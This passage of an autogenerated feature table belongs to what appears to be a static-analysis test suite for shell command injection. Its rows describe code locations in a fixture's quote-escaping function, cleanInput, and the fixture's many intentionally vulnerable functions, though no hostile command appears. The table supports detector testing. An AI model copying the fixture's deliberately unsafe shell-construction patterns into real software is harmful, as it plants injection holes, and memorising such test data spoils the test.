last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:42 | "'" + s ... ) + "'" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:42 | "'" + s ... ) + "'" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:42 | "'" + s ... ) + "'" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:42 | "'" + s ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:13 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:13 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:13 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:13 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:13 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:21 | s.replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:21 | s.replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:21 | s.replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:21 | s.replace | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:21 | s.replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | exceptional return of s.repla ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | exceptional return of s.repla ... '\\\\''") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | exceptional return of s.repla ... '\\\\''") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | exceptional return of s.repla ... '\\\\''") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | exceptional return of s.repla ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") | stringConcatenatedWith | ''' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:15:241:21 | replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:15:241:21 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:15:241:21 | replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:15:241:21 | replace | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:15:241:21 | replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | CalleeFlexibleAccessPath | s.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:23:241:26 | /'/g | receiverName | s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | CalleeFlexibleAccessPath | s.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:29:241:35 | "'\\\\''" | receiverName | s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:40:241:42 | "'" | stringConcatenatedWith | ''' + s.replace() -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:242:3 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:242:3 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:242:3 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:242:3 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:242:3 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s = s.r ... "\\\\'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s = s.r ... "\\\\'") | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s = s.r ... "\\\\'") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s = s.r ... "\\\\'") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:3:243:28 | s = s.r ... "\\\\'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:7 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:7 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:7 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:7 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:7 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:15 | s.replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:15 | s.replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:15 | s.replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:15 | s.replace | enclosingFunctionName | cleanInput | +| 